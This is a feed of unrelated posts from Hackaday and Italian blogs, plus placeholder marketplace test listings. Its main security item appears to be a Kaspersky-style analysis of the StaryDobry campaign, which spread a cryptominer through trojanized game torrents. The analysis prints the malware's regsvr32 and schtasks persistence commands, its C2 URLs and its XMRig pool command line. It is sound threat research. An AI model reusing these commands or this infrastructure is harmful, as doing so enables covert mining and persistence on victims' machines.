È uscito il nuovo Václav Podcast, il podcast di Centrum Report che ogni mese racconta in modo ragionato e approfondito quanto accade tra Polonia, Repubblica Ceca, Slovacchia e Ungheria.

In questo numero parliamo di:

Slovacchia - Il governo Fico tra proteste di piazza e defezioni parlamentari (a partire da 00:38);

Ungheria - Orbán tifa per AfD mentre Budapest pensa a non cambiare il suo skyline (da 04:31);

Polonia - Multe da Bruxelles e voci da Mosca intimoriscono Varsavia (da 10:01);

Repubblica Ceca - Il governo ceco ai ferri corti con Slovacchia e Ungheria (da 16:13).

E tanto altro.

La voce di questo mese è di Alessandro Grimaldi.

Se avete piacere potete ascoltare l'episodio qui:

If you’ve been waiting for news from our upcoming Hackaday Europe event in March, wait no longer. We’re excited to announce the first slice of our wonderful speakers lineup! Get your tickets now,

Hackaday Europe is going down again in Berlin this year on March 15th and 16th at MotionLab. It’s Hackaday, but in real life, and it’s too much fun. The badge is off-the-scale cool, powered by the incredible creativity of our community who entered the Supercon SAO contest last fall, and we’re absolutely stoked to be tossing the four winning entries into your schwag bag in Europe.

If you already know you’ll be attending and would like to give a seven-minute Lightning Talk on Sunday, we’re also opening up the call for talks there. Tell us now what you’d like to talk about so we can all hear it on Sunday morning.

We’re looking forward to the talks and to seeing you all there! We’re getting the last few speakers ironed out, have a keynote talk to announce, and, of course, will open up workshop signups. So stay tuned!

Bunnie Huang
Seeing Through Silicon with IRIS Imaging

IRIS (InfraRed, In-Situ) is a technique for imaging silicon chips in CSP-type packages without removing them from the circuit board. In this short talk, I’ll go over the basics of how the technique works, show a couple of ways to implement it, and share some images of chips.

Sera Evcimen
Hardware Startup/Product Pitfalls

This talk is designed to demystify what causes failures and help hardware startups and innovation projects navigate the complex journey of hardware development by identifying and avoiding common pitfalls. With a focus on providing some examples and actionable strategies, it aims to equip teams to overcome challenges and build a strong foundation for success.

Erik Bosman
Creating light sculptures for fun and, … mostly for fun.

This talk will be about solving interesting problems that I created for myself in the process of creating light sculptures:

– Calculating polyhedral shapes
– Turning those into laser-cut pieces, or oddly-shaped PCBs
– Various methods of routing and driving LEDs
– and creating software that takes advantage of the sculptural nature of the light installation.

Niklas Roy
Vectors, Pixels, Plotters and Public Participation

In his talk, Niklas will highlight some of his latest projects that use DIY machines to involve communities in creating art together. From a graffiti robot to a giant mosaic that was designed by an entire neighborhood with the help of a mobile arcade machine, he’ll share the stories behind his inventions. He will discuss his sources of inspiration, the creative process and thoughts about inclusiveness guiding the development of the machines, and the joy of watching diverse people interact with and contribute to these unconventional art pieces.

Daniel Büchele and Andre Zibell
Developing a NFC-based decentralized payment system for a music festival

For a small volunteer-run music festival we designed and built a custom decentralized NFC payment system. Due to the nature of the festival, the design of the system and hardware had some unique requirements: It had to be fully decentralized and not rely on network connection, which created some interesting security challenges. We also developed custom hardware terminals (based on ESP32) to be used at point-of-sale.

Andy Geppert, Anders Nielsen, and Pierre Muth
The Core64 – NeonPixels – 65uino collaboration

Join us to learn how three unique Hackaday projects came together to create something new for 1975, thanks to international collaboration. (Yes, that’s 50 years ago!)

Alun Morris
Half-size Hacking: 0.05″ Matrix Boards Under the Microscope

How do you make a prototype really tiny without designing a PCB? What you need to get started. How do you connect to standard modules with 0.1″ headers? And the world’s smallest multi-channel voltmeter.

Daniel Dakhno
Hacking a pinball machine

This talk explains how we modernized a classic pinball machine by replacing the mechanical guts with a Raspberry Pi, multiple STM32, and a CAN bus, creating infrastructure that can be exploited far beyond the realm of our project.

hackaday.com/2025/02/18/hackad…

The current Edison Motors semi-truck prototype. (Credit: Edison Motors)
Canadian start-up Edison Motors may not seem like much at first glance — consisting of fewer than two dozen people in a large tent — but their idea of bringing series hybrid technology to semi-trucks may just have wheels. The concept and Edison Motors’ progress is explained in a recent video by The Drive on Youtube, starting off with the point that diesel-electric technology is an obvious fit for large trucks like this. After all, it works for trains.

In a series hybrid, there are two motors: a diesel generator and an electric motor (diesel-electric). This was first used in ships in the 1900s and would see increasing use in railway locomotives starting in the early 20th century. In the case of Edison Motors’ current prototype design there is a 9.0 liter Scania diesel engine which is used solely as a generator at a fixed RPM. This is a smaller engine than the ~15 liter engine in a conventional configuration and also doesn’t need a gearbox.

Compared to a battery-electric semi-truck, like the Tesla Semi, it weighs far less. And unlike a hydrogen-fuel cell semi-truck it actually exists and doesn’t require new technologies to be invented. Instead a relatively small battery is kept charged by the diesel generator and power fed back into the battery from regenerative braking. This increases efficiency in many ways, especially in start-stop traffic, while not suffering a weight penalty from a heavy battery pack and being able to use existing service stations, and jerry cans of diesel.

In addition to full semi-trucks Edison Motors also works on conversion kits for existing semi-trucks, pick-up trucks and more. Considering how much of the North American rolling stock on its rail systems is diesel-electric, it’s more amazing that it would have taken so long for the same shift to series hybrid on its road. Even locomotives occasionally used direct-drive diesel, but the benefits of diesel-electric hybrids quickly made that approach obsolete.

youtube.com/embed/dBMguDfirgA?…

hackaday.com/2025/02/18/it-wor…

Have you yet stumbled upon the principle of “consistently applied small amounts of work can guarantee completion of large projects”? I have, and it’s worked out well for me – on days when I could pay attention to them, that is.

A couple times, I’ve successfully completed long-term projects by making sure to do only a little bit of it, but I do it every day. It helps a lot with the feeling you get when you approach a large project – say, cleaning up your desk after a few days of heavy-duty hacking. If you’re multi-discipline, and especially if you happen to use multiple desks like me, a desk can stay occupied for a while.

Can you do one minute of desk cleaning today? Sure doesn’t feel like much time, or much effort. In a week’s time, however, you might just have a clean desk. Cleaning discrete messes is where this concept applies pretty well – you couldn’t wash floors like this, but you could wipe off the dust from a few surfaces for sure.

Now, I want to make this a habit – use it on like, seven different things a day. I wrote a script to make it possible – here’s how it works for me right now.

Building Upon The Seen-Before

I relied on a few previously-discussed things for this one. Main one is the Headphone Friend project – a pocketable Linux device, streaming audio from my laptop as I walk around my room. As a reminder, the headphones also have a button that emits HID events when pressed/released, and I have a small piece of software that can map actions to combinations of short-medium-long presses of that button.

Another necessity was a bit of software – dodging my questing system “away from laptop = system breaks” mistake, I wanted to put everything into my headphones, even the task names, trying to reach a “flow” through a series of 1-minute tasks. Of course, I reused the old sound library, but I also needed TTS generation on the fly! I went for PicoTTS with a simple wrapper – it’s not the best TTS system, but it’s damn fast, and perfectly suited for a prototype.

For the button-to-action mapping script, I had to expose some sort of API, to avoid merging the button scanning code and the task switching code. After a little deliberation, I picked websockets – they work decently well, and they’re quite portable, so I could run the button monitoring itself on the Headphone Friend device, and the main software on my laptop, for prototyping purposes.

Now, the more interesting question – how do I build the algorithm?

Can Be More, Can’t Be Less

The main thing about the one-minute timers like these is that you can spend longer on the task if you really get into it, you just can’t spend less than one minute. So, the one-minute upper bound is not enforced – only the lower bound is, really, which means that a “next task” button is a requirement.

At the script’s core, I wrote a little state machine describing the “sprints”, and tied my tiny notification-sound-playback library into it. It goes through the five tasks I’ve defined, making a little “beep” after a minute has passed, and waiting for me to press the “next” keypress signaling that I’m done with the task. After five tasks are done, it stops, and waits for the “start” magic keypress sequence – maybe the next sprint is tomorrow, maybe it’s a couple days later, but I get there eventually.

So far, I’ve only had to modify the code a little bit – each task now has a name in the system, but also an actually TTS-pronounceable string, since the picoTTS model does mis-pronounce here and there. Other than that, the very simple prototype works. I’ve tried to upgrade it from picoTTS, compiling piper that can do a good few different voices and languages, but I’ve been firmly stuck on cmake intricacies so far.

Middle-Of-Project Lull

Currently, I’m starting with five tasks – kitchen counter cleaning, hardware desk cleaning, sorting the clothes (in whichever way they need sorting), and cleaning the floors in two rooms. That makes for five minutes minimum, and oftentimes, it’s really just five minutes – to me, feels like it’s important not to get into the flow too much, otherwise the five-minute blitz might become a twenty-minute one, and it gets into “kind a bother to do” mental territory.

The result is, my cooking and hacking surfaces are a little more cleaner and more ready to go on average, and it’s easier to get clothes washing done if there isn’t an unsorted pile to deal with already. I think I most enjoy the movement of it – it’s become a nice way to spend 5-10 minutes moving around the house, breaking the rut. I do need to add some sort of “stop”/”pause” mechanism – sometimes I get too involved in a particular task and could really use a break. My state machine isn’t yet involved enough for this, and maybe soon this might need an overhaul.

At the moment, I’m also looking to tie this into my questing system – I haven’t attached logging to this one yet, but since the questing system includes that, it’d be two-birds-with-one-stone approach. For the questing system, I’m still using the text file backend, which does limit things, but I’ve been meaning to add external action support to it anyway – tying task completion to quest progression is a no-brainer!

Currently, this script and I are in the honeymoon phase: it’s working but I’m waiting for it to fail in more ways, and seeing whether it survives long-term. Based on lessons I’ve been trying to pull from the questing system, I’m trying not to overstretch it – five tasks is enough. For now, it’s pretty nice to be on the island of success in a sea of older solutions that withered away. This time, I’m writing before the full end-conclusion phase, because it’s nice and reassuring when projects work out, and I’d just like to share in that a little bit.

hackaday.com/2025/02/18/hack-o…

Il consumo energetico dell’intelligenza artificiale è da tempo oggetto di dibattito. ChatGPT è stato anche oggetto di critiche più di una volta: in precedenza è stato considerato , che ogni richiesta richiede circa 3 wattora di elettricità, ovvero 10 volte il costo di una richiesta a Google. Tuttavia la nuova ricerca di Epoch AI ha smentito questa cifra.

Secondo Epoch AI, la query ChatGPT media che utilizza il modello GPT-4o consuma solo circa 0,3 wattora. Ciò significa che una domanda rivolta all’IA richiede meno elettricità rispetto alla maggior parte degli elettrodomestici domestici. Ad esempio, una lampadina LED da 10 W consuma la stessa quantità di energia in 6 minuti di funzionamento.
Confronto del consumo energetico per query in ChatGPT con elettrodomestici (Epoch AI)
La differenza nelle stime è dovuta a dati obsoleti. Studi precedenti si sono basati sul presupposto che vengano utilizzati processori server meno efficienti. Tuttavia, negli ultimi anni l’infrastruttura informatica è notevolmente migliorata: i nuovi modelli funzionano con chip più efficienti dal punto di vista energetico e gli algoritmi sono diventati meno costosi. Di conseguenza, il carico sulla rete elettrica si è rivelato molto inferiore a quanto si pensasse in precedenza.

Resta tuttavia aperta la questione del consumo energetico dell’intelligenza artificiale in futuro. Nonostante i guadagni in termini di efficienza, OpenAI e altre aziende continuano ad aumentare la loro potenza di calcolo. Secondo il rapporto di Rand, nei prossimi due anni i data center potrebbero consumare quasi tutta la capacità della rete elettrica della California del 2022 (68 GW). Entro il 2030, l’addestramento di un modello avanzato di intelligenza artificiale potrebbe consumare fino a 8 GW, l’equivalente del funzionamento di otto reattori nucleari.

Un ulteriore onere è creato dalle nuove architetture di intelligenza artificiale, in particolare dai cosiddetti modelli di ragionamento. A differenza di GPT-4o, che risponde quasi istantaneamente, tali sistemi impiegano secondi o addirittura minuti a “pensare” prima di produrre un risultato. Ciò li rende più potenti, ma aumenta anche il consumo di energia. OpenAI ha già iniziato a rilasciare versioni più efficienti dal punto di vista energetico di tali modelli, come l’o3-mini, ma gli esperti dubitano che i miglioramenti in termini di efficienza compenseranno la crescente domanda.

La questione del consumo energetico sta diventando non solo una questione tecnologica, ma anche politica. La scorsa settimana, più di 100 organizzazioni ha firmato una lettera aperta invitando gli enti regolatori a supervisionare la costruzione di nuovi data center. Si sottolinea che la crescita della potenza di calcolo potrebbe portare a una carenza di risorse energetiche e a un aumento della quota di combustibili fossili nel bilancio energetico.

Per ora, l’unico modo per ridurre il carico sulla rete elettrica è attraverso l’uso intelligente della tecnologia. Epoch AI consiglia agli utenti che desiderano ridurre al minimo la propria “impronta di carbonio digitale” di scegliere versioni dei modelli che richiedono meno risorse. Tuttavia, data la crescente popolarità dell’intelligenza artificiale, questa opzione è più temporanea che a lungo termine.

L'articolo Quanta Energia Consuma Chat-GPT di OpenAI? Lo studio di Epoch AI lo rileva proviene da il blog della sicurezza informatica.

Ne avevamo parlato a suo tempo dell’assunzione in ruoli IT di personale Nord Coreano nelle Agenzie federali statunitensi. Ma sembra che l’imputata abbia patteggiato la pena prevista di 97 anni di reclusione.

La donna di 48 anni dell’Arizona si era dichiarata colpevole di accuse relative a un piano criminale che ha visto impiegati da remoto dipendenti IT nordcoreani presso centinaia di aziende statunitensi.

Si dice che lChristian Marie Chapman, di Litchfield Park, Arizona, abbia contribuito a generare oltre 17 milioni di dollari per la Corea del Nord dopo che oltre 300 aziende statunitensi hanno inconsapevolmente assunto personale credendolo cittadino statunitense.

Chapman è stata arrestata a maggio del 2024 e accusata, insieme ad un Ucraino, di aver aiutato tre cittadini stranieri non identificati in un sofisticato schema di frode che ha visto lavoratori IT qualificati provenienti dalla Corea del Nord e da altri paesi assicurarsi posizioni IT remote all’interno di aziende statunitensi.

Secondo il Dipartimento di Stato americano, i tre uomini che hanno aiutato Didenko e Chapman sono “collegati al Dipartimento dell’industria delle munizioni della RPDC, che supervisiona lo sviluppo dei missili balistici, la produzione di armi e i programmi di ricerca e sviluppo della RPDC”.

I lavoratori avevano accesso alle reti aziendali, rappresentando una seria minaccia per la sicurezza nazionale, mentre raccoglievano fondi per la Corea del Nord.

Per agevolare il progetto, Chapman gestiva una “farm” di computer portatili a casa sua, che consentiva ai dipendenti IT all’estero di accedere da remoto alle reti aziendali, pur sembrando che fossero basati negli Stati Uniti.

Tra le vittime di questo schema figurano aziende Fortune 500, tra cui banche statunitensi, fornitori di servizi finanziari, una casa automobilistica, un’azienda tecnologica, un negozio di vendita al dettaglio di lusso, un’azienda aerospaziale e una grande rete televisiva.

Inoltre, sono state compromesse le identità di oltre 70 cittadini statunitensi, i cui nomi sono stati utilizzati per dichiarare falsamente i propri redditi all’IRS. Chapman, che doveva rispondere di molteplici accuse, tra cui cospirazione per frodare i danni degli Stati Uniti, frode telematica, furto di identità e riciclaggio di denaro, rischiava una condanna potenziale massima di 97,5 anni di carcere.

Tuttavia, secondo i termini del suo accordo di patteggiamento, sembra probabile che il tribunale imporrà una pena detentiva federale da 94 a 111 mesi (circa 7-9 anni). Per ridurre le possibilità che le aziende assumano inavvertitamente persone provenienti dalla Corea del Nord, in particolare in ruoli IT remoti, è fondamentale che vengano implementate solide procedure di verifica dell’identità durante il processo di assunzione.

Inoltre, è necessario effettuare controlli approfonditi sui precedenti di tutti i candidati, esaminando attentamente la loro storia lavorativa e verificando eventuali discrepanze nei loro CV o profili online. Inoltre, le aziende e le agenzie di reclutamento dovrebbero fare attenzione a comportamenti sospetti, ad esempio se qualcuno accede ai sistemi aziendali da più indirizzi IP o lavora in orari strani.

Nel 2023, l’FBI e la Corea del Sud hanno fornito consigli sensati sui cosiddetti “segnali d’allarme” che potrebbero indicare che il tuo potenziale nuovo dipendente potrebbe in realtà lavorare per la Corea del Nord.

L'articolo Quando il Tecnico IT Ha Un Accento Nordcoreano. La Donna Patteggia. Ridotti da 97 a 11 anni di carcere proviene da il blog della sicurezza informatica.

test 3 friendica - Questo è un post automatico da FediMercatino.it

Prezzo: 22 €

sdfs saf sa fsadf saf sa fsadf sada

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

test test - Questo è un post automatico da FediMercatino.it

Prezzo: 33 €

wefwe wfwe wefw we

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

If you’ve played any of the versions of Nintendo’s Animal Crossing over the years, you’ll know that eventually you get to the point where you’ve maxed out your virtual house and filled it with all the furniture you could possibly want — which is arguably as close to “winning” the game as you can get.

But now thanks to the work of [decrazyo] there’s a piece of furniture that you can add to your Animal Crossing house that will never get old: an x86 emulator that boots Linux. As explained in the video below, this trick leverages the fact that Nintendo had already built a highly accurate Nintendo Entertainment System (NES) emulator into Animal Crossing on the GameCube, which could be used to run a handful of classic games from within the player’s virtual living room. But it turns out that you can get that emulator to load a user-provided ROM from the GameCube’s memory card, which opens the doors to all sorts of mischief.

In this case, all [decrazyo] had to do was prepare an NES ROM that booted into Linux. That might seem like a tall order, but considering he had already worked on a port of Unix to the classic console, it’s not like he was going in blind. He identified the minimal Embeddable Linux Kernel Subset (ELKS) as his target operating system, but wanted to avoid the hassle of re-writing the whole thing for the 8-bit CPU in the NES. That meant adding another emulator to the mix.

If porting Linux to the NES sounded tough, running an x86 emulator on the console must be pure madness. But in reality, it’s not far off from several projects we’ve seen in the past. If you can boot Linux on an ATmega328 via an emulated RISC-V processor, why not x86 on the NES? In both cases, the only problem is performance: the emulated system ends up running at only a tiny fraction of real-speed, meaning booting a full OS could take hours.

As if things couldn’t get complicated enough, when [decrazyo] tried to boot the x86 emulator ROM, Animal Crossing choked. It turned out (perhaps unsurprisingly) that his ROM was using some features the emulator didn’t support, and was using twice as much RAM as normal. Some re-writes to the emulator sorted out the unsupported features, but there was no getting around the RAM limitation. Ultimately, [decrazyo] had to create a patch for Animal Crossing that doubled the memory of the in-game emulator.

Still with us? So the final setup is a patched Animal Crossing, which is running an in-game NES emulator, which is running a ROM that contains an x86 emulator, which is finally booting a minimal Linux environment at something like 1/64th normal speed. Are we having fun yet?

Despite its age and cutesy appearance, the original Animal Crossing has turned out to be a surprisingly fertile playground for hackers.

youtube.com/embed/OooHTDMUSGY?…

hackaday.com/2025/02/18/give-y…

Prezzo: 3 €

es esfse sesef es

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

C’è chi vive in tenda, chi in un edificio senza riscaldamento. I meno fortunati trovano un muro semi sicuro lungo la strada, costruiscono una struttura di legno e appoggiano sopra delle lenzuola come pareti. Tutti sono senza acqua corrente, senza bagno, senza cibo, senza abbastanza vestiti caldi, senza le medicine necessarie. Ci sono bimbi piccoli, alcuni piccolissimi, appena nati, donne incinte, anziani, malati, uomini e donne di ogni età.

iyezine.com/g4z4-surf-chronicl…

G4Z4 Surf Chronicles Update #1

G4Z4 Surf Chronicles Update #1 - C’è chi vive in tenda, chi in un edificio senza riscaldamento. I meno fortunati trovano un muro semi sicuro lungo la strada, costruiscono una struttura di legno e appoggiano sopra delle lenzuola come pareti.

^{Valentina Sala (In Your Eyes ezine)}

Introduction

On December 31, cybercriminals launched a mass infection campaign, aiming to exploit reduced vigilance and increased torrent traffic during the holiday season. Our telemetry detected the attack, which lasted for a month and affected individuals and businesses by distributing the XMRig cryptominer. This previously unidentified actor is targeting users worldwide—including in Russia, Brazil, Germany, Belarus and Kazakhstan—by spreading trojanized versions of popular games via torrent sites.

In this report, we analyze how the attacker evades detection and launches a sophisticated execution chain, employing a wide range of defense evasion techniques.

Kaspersky’s products detect this threat as
Trojan.Win64.StaryDobry.*, Trojan-Dropper.Win64.StaryDobry.*, HEUR:Trojan.Win64.StaryDobry.gen.

Initial infection

On December 31, while reviewing our telemetry, we first detected this massive infection. Further investigation revealed that the campaign was initially distributed via popular torrent trackers. Trojanized versions of popular games—such as BeamNG.drive, Garry’s Mod, Dyson Sphere Program, Universe Sandbox, and Plutocracy—were designed to launch a sophisticated infection chain, ultimately deploying a miner implant. These malicious releases were created in advance and uploaded around September 2024.

Infection timeline

Although the malicious releases were published by different authors, they were all cracked the same way.

Malicious torrent available for download

Among the compromised installers are popular simulator and sandbox games that require minimal disk space. Below is the distribution of affected users by game as of January 2025:

Infected users per game (download)

These releases, often referred to as “repacks”, were usually distributed in an archive. Let’s now take a closer look at one of the samples. Upon unpacking the archive, we found a trojanized installer.

Technical details

Trojanized installer

After launching the installer (a Windows 32-bit GUI executable), we were welcomed with a GUI screen showing three options: install the game, choose the language, or quit.

Installer screen

This installer was created with Inno Setup. After decompiling the installer, we examined its code and found an interesting functionality.

Decompiled installer code

This code is responsible for extracting the malicious files used in this attack. First, it decrypts unrar.dll using the DECR function, which is a proxy for the RARExtract function within the rar.dll library. RARExtract decrypts unrar.dll using AES encryption with a hard-coded key,
cls-precompx.dll. Next, additional files from the archive are dropped into the temporary directory, and execution proceeds to the RARGetDllVersion function within unrar.dll.

Unrar.dll dropper

First of all, the sample runs a series of methods to check if it’s being launched in a debugging environment. These methods search for debugger and sandbox modules injected into processes, and also check the registry and filesystem for certain popular software. If such software is detected, execution immediately terminates.

Anti-debug checks example

If the checks are passed, the malware executes cmd.exe to register unrar.dll as a command handler with regsvr32.exe. The sample attempts to query the following list of sites to determine the user’s IP address.
api.myip [.]com
ip-api [.]com
ipapi [.]co
freeipapi [.]com
ipwho [.]is
api.miip [.]my
This is done to identify the infected user’s location, specifically their country. If the malware fails to detect the IP address, it defaults the country code to
CNOrBY (meaning “China or Belarus”). Next, the sample sends a request to hxxps://pinokino[.]fun/donate_button/game_id=%s&donate_text=%s with the following substitutions:

• game_id = appended with DST_xxxx, where x represents digits. This value is passed as an argument from the installer; in this campaign, we discovered the variant DST_1448;
• donate_text = appended with the country code.

After this generic country check, the sample collects a fingerprint of the infected machine. This fingerprint consists of various parameters, forming a unique identifier as follows:
mac|machineId|username|country|windows|meminGB|numprocessors|video|game_id

This fingerprint is then encoded using URL-safe Base64 to be sent successfully over the network. Next, the malware retrieves MachineGUID from HKLM\Software\Microsoft\Cryptography and calculates its SHA256 checksum. It then collects 10 characters starting from the 20^th position (
SHA256(MachineGUID)[20:30]). This hexadecimal sequence is used as the filename for two newly created files: %SystemRoot%\%hash%.dat and %SystemRoot%\%hash%.efi. The first file contains the encoded fingerprint, while the second is an empty decoy. The creation time of the .dat file is spoofed with a random date between 01/01/2015 and 12/25/2021. This file stores the Base64-encoded fingerprint.
After this step, unrar.dll starts preparing to drop the decrypted MTX64.exe to the disk. First, it generates a new filename for the decrypted payload. The malware searches for files in %SystemRoot% or %SystemRoot%\Sysnative. If these directories are empty, the decrypted MTX64.exe is written to the disk as Windows.Graphics.ThumbnailHandler.dll. Otherwise, unrar.dll creates a new file and names it by choosing a random file from the specified directories, taking its name, trimming its extension and appending a random suffix from a predefined list. Besides suffixes, this list contains junk data, most likely added to evade signature-based detection.

Suffix list and junk data

For example, if the malware finds a file named msvc140.dll in %SystemRoot%, it removes the extension and appends the resulting
msvc140 with handler.dll (a random suffix from the list), resulting in msvc140handler.dll. The malware then writes the decrypted payload to the newly generated file in the %SystemRoot% folder.
After that, the sample opens the encrypted MTX64.exe and decrypts it using AES-128 with a hard-coded key,
cls-precompx.dll.
The loader also carries out resource spoofing. First of all, it scans the _res.rc file for DLL property names and values—such as CompanyName, FileVersion and so on—and creates a dictionary of (key, value) pairs. Then it takes a random DLL from the %SystemRoot% folder (exiting if nothing is found), extracts its property values using the VerQueryValueW WinAPI, and replaces the corresponding dictionary values. The resulting resources are embedded into the decrypted MTX64.exe DLL. This file is then saved under the name generated in the previous step. Finally, unrar.dll changes the creation time of the resulting DLL using the same spoofing method as for the fingerprint file.

Spoofed resources

The dropped DLL is installed using the following command:
cmd.exe /C "cd $system32 && regsvr32.exe /s %dropped_name%.dll"

MTX64

This DLL is based on a public project called EpubShellExtThumbnailHandler, a Windows Shell Extension Thumbnail Handler. This stage completely mimics the legitimate behavior up until the actual thumbnail handling. It gets registered as a .lnk (shortcut) file handler, so whenever a .lnk file is opened, the DLL tries to process its thumbnail. However, here the sample implements its own version of the GetThumbnail interface function, and creates a separate thread to perform its malicious activities.

First, this thread writes the current date and month in
dd-mm format to the %TEMP%\time_windows_com.ini file. This stage then retrieves MachineGUID from HKLM\SOFTWARE\Microsoft\Cryptography, calculates SHA256(MachineGUID)[20 : 30], just like unrar.dll did. After that, it checks %SystemRoot% for the .dat file with this name. The presence of this file confirms that the infection is uninterrupted, prompting the DLL to extract the fingerprint and make a query to the hard-coded threat actors’ domain in the following format, where the UID is the fingerprint’s SHA256 hash.hxxps://promouno[.]shop/check/uid=%s
The server sends back a JSON that looks like
{'code':'reg'}. After this, the DLL makes another query to the server with an additional field, data, which is the Base64-encoded fingerprint (uid remains the same):hxxps://promouno[.]shop/check/uid=%s&data=%s
Upon receiving this request, the server also sends a JSON. The malware checks its
code field, which must be equal to either 322 or 200. If it is, the sample proceeds to extract the MD5 checksum from the flmd field in the same JSON and download the next-stage payload from the following link:hxxps://promouno[.]shop/dloadm/uid=%s
Next, the sample calculates the MD5 checksum of the received payload (a kickstarter PE file), and checks this hash against the MD5 checksum from the JSON. If they match, the malware parses the PE structure to locate the Export Address Table, retrieves the
kickstarter function address, and executes it.

Kickstarter running

Kickstarter

The kickstarter PE has an encrypted blob in its resources. This stage reads the blob and stores it in a C++ vector of bytes.

Resource reading

After that, it chooses a random name for the payload using the same method as for MTX64.exe during the execution of unrar.dll. However, there is a difference: if nothing is found in %SystemRoot% or %SystemRoot%\Sysnative, it chooses Unix.Directory.IconHandler.dll as a default file name. The payload is saved to %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. To locate the InstallDate directory, the DLL retrieves the system installation date from the registry subkey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate.

Then the blob is decrypted using the CryptoPP AES-128 implementation. The key consists of the sequence of bytes from
\x00 to \x10. The decrypted contents are written onto the disk. This executable also spoofs its resources using the same method as for MTX64.exe, after which it executes the following command:schtasks /create / tn %s /tr "regsvr32.exe /s %s" / st 00:00 /du 9999:59 / sc once / ri 1 /f
The first argument is the system installation date, while the second one is the path to the dropped DLL. A scheduled task to register a server with regsvr32.exe is created, using the first argument as its name, with a suppressed warning, set to trigger at 00:00. The loader sends a GET request to the hard-coded address
45.200.149[.]58/conf.txt, implicitly setting the request header to User-Agent: StupidSandwichAgent\r\n.
The loader then waits for a response from the server. If the response begins with act, the sample stops execution after creating the scheduled task. If the response is noactive, meaning the targeted device has not been registered previously, the sample tries to delete itself with the following command, which clears everything in the %temp% directory:

Cleanup

Unix.Directory.IconHandler.dll

Subsequently, Unix.Directory.IconHandler.dll creates a mutex named com_curruser_mttx. If this mutex has already been created, execution stops immediately. Then the DLL searches for the %TEMP%\_cache.binary file. If the sample can’t find it, it downloads the binary directly from
45.200.149[.]58 using a GET 44912.f request, with the same StupidSandwichAgent User-Agent header. This file is written to the temporary directory and then decrypted using AES-128 with the same key consisting of the \x00–\x10 byte sequence.
The sample proceeds to open the current process, look for SeDebugPrivilege in the process token, and adjust it if applicable. We believe this is done to inject code into a newly created cmd.exe process. The author chose the easiest way possible, copying the entire open source injector, including its debug strings:

Injector

After injecting the code into the command interpreter, the sample enters an endless loop, continuously checking for taskmgr.exe and procmon.exe in the list of running processes. If either process is detected, the sample is shut down.

Miner implant

This implant is a slightly modified XMRig miner executable. Instead of parsing command-line arguments, it constructs a predefined command line.
xmrig – url =45.200.149[.]58:1448 –algo= rx /0 –user=new-www –donate-level=1 –keepalive – nicehash –background –no-title –pass=x – cpu -max-threads-hint=%d
The last parameter is calculated from the CPU topology: the implant calls the GetSystemInfo API to check the number of processor cores. If there are fewer than 8, the miner does not start. Moreover, the attacker chose to host a mining pool server in their own infrastructure instead of using a public one.

XMRig parses the constructed command line using its built-in functionality. The miner also creates a separate thread to check for process monitors running in the system, using the same method as in the previous stage:

Anti-tracing

Victims

This campaign primarily targets regular users by distributing malicious repacks. Some organizations were also affected, but these seem to be compromised computers inside corporate infrastructures, rather than direct targets.

Most of the infections have been observed in Russia, with additional cases in Belarus, Kazakhstan, Germany, and Brazil.

Attribution

There are no clear links between this campaign and any previously known crimeware actors, making attribution difficult. However, the use of Russian language in the PDB suggests the campaign may have been developed by a Russian-speaking actor.

Conclusions

StaryDobry tends to be a one-shot campaign. To deliver the miner implant, the actors implemented a sophisticated execution chain that exploited users seeking free games. This approach helped the threat actors make the most out of the miner implant by targeting powerful gaming machines capable of sustaining mining activity. Additionally, the attacker’s use of DoH helped conceal communication with their infrastructure, making it harder to detect and trace the campaign.

Indicators of compromise

File hashes

15c0396687d4ff36657e0aa680d8ba42
461a0e74321706f5c99b0e92548a1986
821d29d3140dfd67fc9d1858f685e2ac
3c4d0a4dfd53e278b3683679e0656276
04b881d0a17b3a0b34cbdbf00ac19aa2
5cac1df1b9477e40992f4ee3cc2b06ed

Domains and IPs

45.200.149[.]58
45.200.149[.]146
45.200.149[.]148
hxxps://promouno[.]shop
hxxps://pinokino[.]fun

securelist.com/starydobry-camp…

Microsoft ha annunciato la rimozione della funzione Location History da Windows 10 e 11, eliminando di fatto la possibilità per le applicazioni di accedere alla cronologia delle posizioni del dispositivo. Una decisione che solleva interrogativi nel mondo della cybersecurity: una mossa per rafforzare la privacy o un cambiamento che potrebbe influenzare la sicurezza e la forensic analysis?

Cosa cambia con la rimozione della cronologia delle posizioni?

La funzione Location History consentiva ad applicazioni come Cortana di accedere alla posizione del dispositivo registrata nelle ultime 24 ore. Con la sua rimozione, questi dati non verranno più salvati localmente e l’opzione sparirà dalle impostazioni di Windows (Privacy & Security > Location).

Microsoft ha dichiarato: “Stiamo deprecando e rimuovendo la funzione Location History, un’API che permetteva a Cortana di accedere alle ultime 24 ore di cronologia delle posizioni del dispositivo quando la localizzazione era abilitata.”

L’API Geolocator.GetGeopositionHistoryAsync, che permetteva l’accesso ai dati memorizzati localmente, verrà dismessa. Ciò significa che le app non potranno più recuperare automaticamente le posizioni passate del dispositivo, eliminando un potenziale vettore di attacco ma anche uno strumento di monitoraggio.

Impatto sulla sicurezza e sulla forensic analysis

Questa decisione si inserisce in un trend più ampio di maggiore attenzione alla privacy, seguendo normative come GDPR e CCPA, che impongono restrizioni più severe sulla raccolta e conservazione dei dati personali. Tuttavia, la rimozione di questa funzione potrebbe avere effetti collaterali imprevisti:

• Limitazione delle indagini forensi: gli analisti di sicurezza spesso usano dati di localizzazione per individuare attività sospette o analizzare movimenti legati a minacce informatiche.
• Meno strumenti per le aziende: alcune organizzazioni utilizzano la cronologia delle posizioni per verificare accessi anomali o per migliorare la protezione dei dispositivi aziendali.
• Riduzione del rischio di esfiltrazione: la rimozione della cronologia delle posizioni potrebbe diminuire la superficie di attacco per i cybercriminali che sfruttano questi dati per tracciare utenti o pianificare attacchi mirati.

